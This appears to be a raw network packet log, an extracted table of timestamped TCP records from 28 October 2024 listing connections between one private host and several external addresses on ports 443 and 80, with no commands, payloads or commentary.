                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.845690012 CET49831443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.845716953 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.851912022 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.852049112 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.852116108 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.852580070 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.852580070 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.852632999 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.852658033 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.857321978 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.857342005 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.857424974 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.857549906 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.857563019 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.867352962 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.874408007 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.874459028 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.874505997 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.874675989 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.874686003 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.874749899 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.874754906 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.876964092 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.876991034 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.877062082 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.877193928 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.877207994 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.880486012 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.880500078 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.880539894 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.907500982 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.907582045 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.907671928 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.907994032 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.908010960 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.908024073 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.908030033 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.910633087 CET49834443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.910649061 CET4434983413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.910752058 CET49834443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.911053896 CET49834443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.911062956 CET4434983413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.912622929 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.912636042 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.912647963 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.912686110 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.912719965 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.912974119 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.912986040 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.913011074 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.913022995 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.913032055 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.913057089 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.913971901 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.913984060 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.913995028 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914009094 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914021969 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914062977 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914105892 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914119005 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914130926 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914136887 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914143085 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914160967 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914165974 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.914199114 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948286057 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948302031 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948321104 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948332071 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948339939 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948359966 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948378086 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948400974 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948407888 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.948422909 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.978584051 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.978641987 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.978696108 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.978751898 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.978940010 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.978988886 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979027033 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979038954 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979077101 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979599953 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979613066 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979624033 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979634047 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979645014 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979650974 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979657888 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979671001 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.979696035 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.988655090 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.002552986 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.011131048 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.011262894 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.011698008 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.011744976 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.044780970 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.044887066 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.045207024 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.045232058 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067749977 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067764997 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067785025 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067794085 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067816019 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067826033 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067831993 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.067883968 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096245050 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096314907 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096426010 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096440077 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096476078 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096493959 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096669912 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096682072 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.096733093 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097045898 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097058058 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097218037 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097429991 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097446918 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097460032 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097485065 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.097503901 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188281059 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188292027 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188314915 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188330889 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188342094 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188354969 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188361883 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188400984 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.188415051 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.189090014 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.189188004 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.189201117 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.189212084 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.189239025 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.189254045 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.213845015 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.213859081 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.213871002 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.213949919 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.213949919 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214502096 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214514017 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214586973 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214596987 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214596987 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214622021 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214658022 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.214694023 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.215445042 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.215493917 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.215529919 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.216412067 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.216423035 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.216505051 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.216505051 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.223942041 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.224251986 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.224287033 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.225269079 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.225348949 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.226340055 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.226408005 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.226563931 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.267364025 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.305759907 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.305769920 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.305780888 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.305814981 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.305824041 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.305856943 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.308182955 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.308197021 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.308249950 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.308269024 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.308281898 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.308326960 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.331599951 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.331666946 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332060099 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332072973 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332128048 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332283974 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332285881 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332298040 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332305908 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332360983 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332376957 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332389116 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332400084 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332413912 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.332452059 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355053902 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355067015 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355142117 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355149031 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355161905 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355187893 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355190039 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355217934 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.355257988 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.357104063 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.357340097 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.357366085 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.357958078 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.357971907 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.358333111 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.358400106 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.359021902 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.359098911 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.360260010 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.360346079 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.360419035 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.360428095 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.360445976 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.375602961 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.375674009 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.375680923 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.375693083 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.375725985 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.375865936 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.376138926 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.407334089 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.422909021 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.422996044 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.423007011 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.423069000 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428554058 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428566933 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428589106 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428620100 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428633928 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428651094 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428678036 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.428689003 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.430886030 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.432521105 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.432547092 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.432971954 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.432977915 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448429108 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448487043 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448497057 CET804979677.83.175.105192.168.2.5
